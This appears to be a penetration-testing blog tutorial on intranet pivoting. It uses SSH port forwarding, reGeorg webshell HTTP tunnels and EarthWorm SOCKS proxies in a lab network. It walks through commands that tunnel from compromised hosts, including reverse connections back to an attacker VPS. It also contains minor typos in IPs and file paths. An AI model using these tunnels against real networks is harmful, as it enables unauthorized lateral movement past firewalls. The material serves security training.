Intranet penetration test: hidden communication tunnel technology (part 2)

Category: Tags: ,

In Intranet penetration test: hidden communication tunnel technology (part 1),We explained the tunneling technology of the network layer (IPv6 tunnel, ICMP tunnel) and the tunneling technology of the transport layer (TCP tunnel, UDP tunnel, conventional port forwarding). Nowadays, a large number of TCP and UDP communications are intercepted by defense systems. Traditional Socket tunnels are on the verge of being eliminated. DNS, ICMP, HTTP/HTTPS and other difficult-to-ban protocols have become the main channels for attackers to control the tunnel. In this section, we will give an experimental explanation of the application layer tunnel SOCKS proxy technology. I will write a special topic for the application layer DNS tunnel in the future.

Application layer tunneling technology
The Application layer is the seventh layer of the seven-layer OSI model. The application layer directly interfaces with application programs and provides common network application services. The application layer tunnel technology mainly uses the port provided by the application software to send data. Commonly used protocols are SSH, HTTP/HTTPS, and DNS. Here we mainly explain SSH and HTTP/HTTPS, DNS tunnel I will write a special topic to explain in the future.
SSH protocol

SSH is a security protocol based on the application layer, a protocol designed to provide security for remote login sessions and other network services. The use of SSH protocol can effectively prevent information leakage during remote management. SSH was originally a program on UNIX systems, and then quickly expanded to other operating platforms. The SSH client is suitable for multiple platforms. Almost all UNIX platforms—including HP-UX, Linux, AIX, Solaris, DigitalUNIX, Irix, and other platforms, can run SSH.
In general, SSH protocol transmission is allowed to pass through firewalls and border devices, and the SSH transmission process is encrypted. It is difficult to distinguish whether it is a legal SSH session or a tunnel established by an attacker, so it is often used by attackers. After the attacker uses the SSH tunnel to break through the firewall restrictions, he can establish some TCP connections that could not be established before.

SSH commands

ssh username@ip -p <port number>
The commonly used parameters for creating an ssh tunnel are:
  • -C:Compress transmission, increase transmission speed
    -f: transfer ssh transmission to background execution without occupying the current shell
    -N: Silent connection, no specific conversation can be seen after connection
    -g: Allow remote hosts to connect to the local port used for forwarding
    -L: local port forwarding
    -R: remote port forwarding
    -D: dynamic forwarding (SOCKS proxy)
    -p: Specify the ssh port
Local forwarding experiment
test environment:

Attacker vps
Analog external network IP: 192.168.1.101
Intranet web server
Analog external network IP: 192.168.103
Intranet IP: 192.168.52.128
Intranet victim machine Windows Server 8
Intranet IP: 192.168.52.138

The attacker vps can access the intranet web server, but cannot access the intranet victim machine Windows Server 8. The intranet web server and the intranet victim machine Windows Server 8 can visit each other. Our idea is to use the Web server as a springboard to access port 3389 of Windows Server 8. The premise of the use is that the plaintext password has been obtained.
Execute on the attacker vps:
ssh -CfNg -L 1153 (vps port): 192.168.52.138 (target machine ip): 3389 (target port) root@192.168.1.103 (springboard)
//The attacker vps takes the initiative to connect to the web
-L: local port forwarding
Execute the following command to check whether the local port 1153 has been connected. It can be seen that during the local mapping, the local ssh process listened to port 1153.
The principle here is to use the web server 192.168.1.103 as a springboard to map port 3389 of the intranet Windows Server 8 (192.168.52.138) to port 1153 of the attacker’s vps. We execute the following command to access the local port 1153 of vps. You can access port 3389 of the intranet Windows Server 8 (192.168.52.138):
rdesktop 127.0.0.1:1153
As you can see, I successfully connected to the remote desktop of Windows Server 8 in the intranet. This method only needs to execute one command on the attack host, which is relatively convenient.
Remote forwarding experiment
It is still a similar test environment, but at this time there is no border device in the internal network, so the attacker vps cannot access these three machines in the internal network; the internal web server can access the external vps, windows server 8 and domain controllers are all Can not access the external network vps. Our idea is to access port 3389 of the internal network windows server 8 through the external network vps.
Execute the following command on the web server (192.192.52.128),
ssh -CfNg -R 3307 (vps port): 192.168.52.138 (target machine ip): 3389 (target port) root@192.168.1.101 (vps)

// The victim host actively connects to vps
-R: remote port forwarding
Visible on vps:
Here, we use the web server as a springboard to forward the traffic of port 3307 of vps to port 3389 of the intranet windows server 8 (192.168.52.138). When we visit port 3307 of vps, we can access the remote desktop of port 3389 of windows server 8 in the intranet:
Dynamic forwarding experiment
The port forwarding types introduced above are all called static port forwarding. The so-called “static” means that the IP address and listening port of the application server are fixed. Imagine another application scenario: setting the browser to access websites on different networks through port forwarding. The characteristic of this type of application is that the IP and port of the target server are unknown and always changing. It is impossible to know this information when creating port forwarding. The IP and port of the target server can only be determined when sending an HTTP request. In this scenario, static port forwarding is not feasible, so a special port forwarding method is required, that is, “dynamic port forwarding”. SSH dynamic port forwarding is implemented through the Socks protocol. When creating dynamic port forwarding, the SSH server is similar to a Socks proxy server, so this forwarding method is also called Socks forwarding.
The test environment is as follows:
We execute the following commands on vps to establish a dynamic SOCKS proxy channel,
ssh -CfNg -D 7000 root@192.168.1.103(intranet web)
Here, the command does not need to specify the target server and port number as before. After executing the above command, the SSH client (attack machine vps) will start to monitor port 7000 of the local localhost. You can specify the Socks server in the browser network configuration on this machine as 127.0.0.1:7000. Then the request in the browser will be forwarded to the SSH server (intranet web server), and the SSH server will establish a connection with the target site machine (intranet file server) for communication.
As you can see, when using dynamic mapping, the ssh process of the local host listens to port 7000. We open the browser on the attacker vps, set it up, and set up the proxy network:
In this way, you can access the intranet file server through the browser:

The dynamic port forwarding here is actually to establish a ssh-encrypted SOCKS proxy channel. The SOCKS proxy simply connects the system on one end to the other end, and sends your network data requests through a channel between you and the target machine. One end forwards to the other end. Any program that supports the SOCKS protocol can use this encrypted channel for proxy access.

HTTP(S) protocol

HTTP protocol is hypertext transfer protocol, which is a very simple communication protocol that is most widely used in Internet uplink information transmission. Part of the local area network restricts the protocol and only allows users to access external websites through the HTTP protocol. The HTTP Service proxy is used to forward all traffic to the intranet.
reGeorg
Download link: https://github.com/sensepost/reGeorg

First of all, we need to understand the difference between forward proxy and reverse proxy:

 

Forward Proxy

Lhost-->proxy-->Rhost

In order to access Rhost, Lhost sends a request to the proxy proxy server and specifies that the target is Rhost, then the proxy forwards the request to Rhost and returns the obtained content to Lhost. Simply put, the forward proxy is that the proxy replaces us to visit Rhost.

Reverse proxy

Lhost<-->proxy<-->firewall<-->Rhost

Contrary to the forward proxy, Lhost only sends ordinary requests to the proxy. The proxy determines where to go, and then submits the returned data back. The advantage is that it can be effective when some firewalls only allow proxy data to enter and exit. To penetrate.

Simply put, forward proxy means that the attacker actively accesses the target machine through the proxy, and reverse proxy means the target machine actively connects through the proxy. The reDuh and tunna we usually use, like reGeorg, are all forward agents. Generally, users upload a proxy script to the server, the local program connects to the script on the server, and the script program acts as a proxy to forward ports and traffic.

reGeorg is an upgraded version of reDuh. The main function is to forward the data of the intranet server port to the machine through the HTTP(S) tunnel to realize communication based on the HTTP protocol.
The test environment is as follows:
There are three hosts on the internal network, of which the web server has two network cards, which are connected to the internal and external networks. The remaining two hosts on the internal network cannot communicate with the external network, but can communicate with the web server win7; the attacker vps can access the web server. Our idea is to use the HTTP Server proxy to forward all the attacker’s traffic to the intranet to achieve control over the remaining hosts on the intranet.
Upload the script file tunnel.nosocket.php corresponding to reGeorg to the target web server. At this time, the attacker accesses the tunnel.nosocket.php file on the remote server. After the page returns “Georg says,’All seems fine'”, the attacker kali Use the reGeorgSocksProxy.py script to monitor the local port 9999 to establish a communication link.

Upload tunnel.(aspx|ashx|jsp|php) to the target Web server during operation, depending on what language the remote server supports. I am here as a php server, so we upload tunnel.nosocket.php. PHP is divided into sockets and non-sockets. Tunnel.php needs to use the dl() function to load the socket module, which needs to modify php.ini, so we use It is tunnel.nosocket.php.

Then the attacker executes:
python reGeorgSocksProxy.py -u http://192.168.1.7/tunnel.nosocket.php -p 9999
The program stuck at “Georg says,’All seems fine'” means it is running normally.
Next install and configure proxychains-ng
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure
make && make install
cp ./src/proxychains.conf /etc/proxychians.conf
cd .. && rm -rf proxychains-ng
Edit the proxychains configuration file:
vim /etc/proxychains.conf

Add at the end

socks5 127.0.0.1 9999 // 9999 is your own port, which needs to be the same as the port set in reGeorg
Now you can use proxychains to proxy the application on the attacker’s vps local host to access the resources in the target intranet. The method of use is to add proxychains4 in front of the tool name, such as nmap scanning the intranet windows server 8 host through proxychains Port:
proxychains4 nmap 192.168.52.138 -Pn -sT -p 3389         // -Pn and -sT must have
You can see that there is data transmission in the shell that sets the proxy)
Next, open the remote desktop of the intranet windows server 8 host:
proxychains4 rdesktop 192.168.52.138
Success. Of course, the windows system can use tools such as SocksCap for proxy:
Another important technology of application layer tunneling is DNS tunneling technology. I will write a special topic to introduce it in the future.
SOCKS proxy technology
Socks proxy is an all-powerful proxy, just like an adapter board with many jumpers, it simply connects the system on one end to the other end. Supports multiple protocols, including http, ftp requests and other types of requests. It is divided into two types, socks 4 and socks 5. Socks 4 only supports TCP protocol and socks 5 supports TCP/UDP protocol, and also supports various authentication mechanisms and other protocols. Its standard port is 1080. Socks proxy The corresponding proxy server using the socks protocol is the SOCKS server, which is a general proxy server. Use SOCKS to communicate with the target intranet computer to avoid multiple use of port forwarding.
There are three common network scenarios as follows:
In the internal network, the server can access the external network at will.
In the internal network, the server can access the external network, but the server is installed with a firewall to reject connections on sensitive ports.
In the internal network, the server only opens some ports (for example, port 80), and the server cannot access the external network.
EarthWorm
Download link: https://github.com/rootkiter/EarthWorm
https://codeload.github.com/idlefire/ew/zip/master
EW is a portable network penetration tool with two core functions: SOCKS v5 service setup and port forwarding. It can complete network penetration in a complex network environment. EarthWorm can open a network tunnel in “forward”, “reverse”, “multi-level cascade” and other ways to reach the depths of the network, breaking through network restrictions with earthworms’ unique means, and loosening the ground on the firewall. There are multiple executable files in the toolkit to adapt to different operating systems (Linux, Windows, Mac OS, ARM-Linux are all included)
reGeorg
Download link: https://github.com/sensepost/reGeorg
The main function of reGeorg is to forward the port of the intranet server to the local machine through the HTTP(S) tunnel, forming a loop. It can make the target server connect to the internal open port in the internal network (or when the port policy is set). reGeorg uses webshell to establish a socks proxy for intranet penetration, and the server must support one of ASPX, PHP, and JSP.
SockCap64
Download link: http://www.sockscap64.com/
SockCap64 is a very useful proxy software in the Windows environment, which can make Windows applications access the network through a SOCKS proxy server.
Proxifier
Download link: https://www.proxifier.com/
Proxifier is also a very easy-to-use global proxy software, which provides cross-platform port forwarding and proxy functions, and is suitable for Windows, Linux, and Mac OS platforms.
ProxyChains
Download link: https://github.com/rofl0r/proxychains-ng
http://proxychains.sourceforge.net/
ProxyChains is a software that can implement a global proxy under Linux. It is very easy to use. It can enable any application to access the Internet through a proxy, allow TCP and DNS traffic to pass through the proxy tunnel, and support HTTP, SOCKS 4, and SOCK 5 type proxy servers.
Let me talk about the specific usage of these tools.
EarthWorm
EW has six command formats, namely ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran. The ssocksd command is used for forward connections in a normal network environment, rcsocks and rssocks are used for rebound connections, and other commands are used for multi-level cascading in complex network environments.
Test environment: there is a personal computer on the left, which is the attacker’s computer, located in the attacker’s intranet, and the attacker also has a vps in the public network; on the right is a victim intranet with three machines, which we have controlled The web server has two network cards, which are the key nodes connecting the external network and the internal network, and other machines on the internal network cannot be directly connected.
(1) Forward SOCKS 5 server
It is applicable when the target machine has an external IP address, as shown in the figure above, the simulated external IP of the intranet web server is 192.168.1.7. Upload the corresponding ew program on the web server and execute:
ew_for_Win.exe -s ssocksd -l 888
In this way, a socks proxy service with port 888 is set up on the intranet web server. Next, we can set up proxychains or SocksCap64 to add the proxy of this socks proxy server (192.168.1.7). Configure proxychains:
Open the remote desktop of the intranet Windows server 8:
proxychains4 rdesktop 192.168.52.138
(2) Rebound SOCKS 5 server
The forward SOCKS 5 server is applicable when the target machine has an external IP address. Assuming that the target machine does not have a public IP address, how do we access internal resources?
In this test environment, it is similar to the previous one, except that the web server does not have a public IP, but can access the Internet; the VPS is a real public network vps.
Upload ew_for_linux64 on the attacker’s public network vps and execute:
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
This command means to add a transit tunnel on the vps, monitor 1234, and forward the proxy request received by the local port 1234 to port 1080, where port 1234 is only used to transmit traffic.
Then, upload ew_for_Win.exe to the intranet web server (192.168.52.143) and execute the command:
ew_for_Win.exe -s rssocks -d 39.xxx.xxx.210 -e 1234
This command means to start the SOCKS5 service on the victim’s web server and bounce it back to port 1234 on the public IP address 39.xxx.xxx.210. At this time, “rssocks cmd_socket OK!” is displayed on the vps, indicating that the connection is successful:
Now you can configure tools such as proxychains or SocksCap64 on the attacker’s computer to use the socks4 proxy service set up on the intranet web server by accessing the 1080 port of the public network vps (39.xxx.xxx.210). If we open the remote desktop of the intranet file server:
proxychains4 rdesktop 192.168.52.141
(3) Secondary network environment (a)
It is applicable when the target machine has an external IP address.
Host A on the right side has two network cards, one is connected to the external network (192.168.1.7), and the other can only be connected to host B on the internal network, but cannot access other host resources in the internal network. Host B can access other resources in the intranet, but not the external network. Suppose we have obtained the control rights of host A and host B.
We first upload ew to host B, and start the forward socks proxy of port 1234 in ssocksd mode:
ew_for_Win.exe -s ssocksd -l 1234
Then, upload ew to host A and execute the command:
ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.52.138 -g 1234
This command forwards the proxy request received by host A on port 1080 to port 1234 on host B (192.168.52.138).
Now, we can use the socks proxy service set up on host B by accessing port 1080 of host A’s public IP (192.168.1.7). Configure proxychains:
Use ssh to connect to the intranet server (192.168.52.128):
connection succeeded.
(4) Secondary network environment (b)
The one just now applies to the situation where the target machine has an external IP address, assuming that the target machine does not have a public IP address, what should we do?
As shown in the above environment, host A has no public IP and may be able to access the external network and cannot access other host resources in the internal network, but can access host B in the internal network; host B in the internal network can access internal resources but not the external network. Suppose we have obtained the control authority of host A and host B.
Here, we cannot access host A to use the socks proxy service set up on host B in the intranet as in the previous case, and can access the socks service set up on host B by accessing vps.
We first upload ew on the public network vps, add a transfer tunnel on the public network vps, monitor port 1080, and send the proxy request received from port 1080 to port 1234, and execute the command:
ew_for_linux64 -s lcx_listen -l 1080 -e 1234
Then upload ew to the host of intranet B (192.168.52.138), and use ssocksd to start the forward socks proxy of port 999, and execute the command:
ew_for_Win.exe -s ssocksd -l 999
Finally, upload ew to the internal network A host, use the lcx_slave method on the A host (192.168.52.143) to connect the 1234 port of the public network vps with the internal network B host (192.168.52.138) port 999, and execute the command :
ew_for_Win.exe -s lcx_slave -d 39.xxx.xxx.210 -e 1234 -f 192.168.52.138 -g 999
At this point, you can set up proxy tools such as proxychains, and use the socks proxy service set up on the internal network B host by accessing the 1080 port of the public network vps. Set up proxychains as follows:
Access the remote desktop of the intranet machine (192.168.52.141):
The visit was successful. In addition to proxychains, we can also use proxy tools such as proxifier and sockscap64. As follows, we use sockscap64 to access intranet machines.
Open, sockscap64, add the application you want to proxy (the method is very simple, just drag in after you find the executable file), here I add the remote desktop program
Click the “Proxy” above, go in and add a proxy, set the IP of the vps or proxy server and the specified port.
After adding, click “Save” in the lower right corner. Back to the main interface, click the “lightning” button to test whether the proxy server can connect normally
After a normal connection, right-click the remote desktop program and select “Run the selected program in the proxy tunnel” to access the remote machine on the intranet
In the same way, we can also use the browser to access the resources of the intranet. For example, we can access the resources on the intranet server 192.168.52.128:

Reviews

There are no reviews yet.

Be the first to review “Intranet penetration test: hidden communication tunnel technology (part 2)”

Your email address will not be published. Required fields are marked *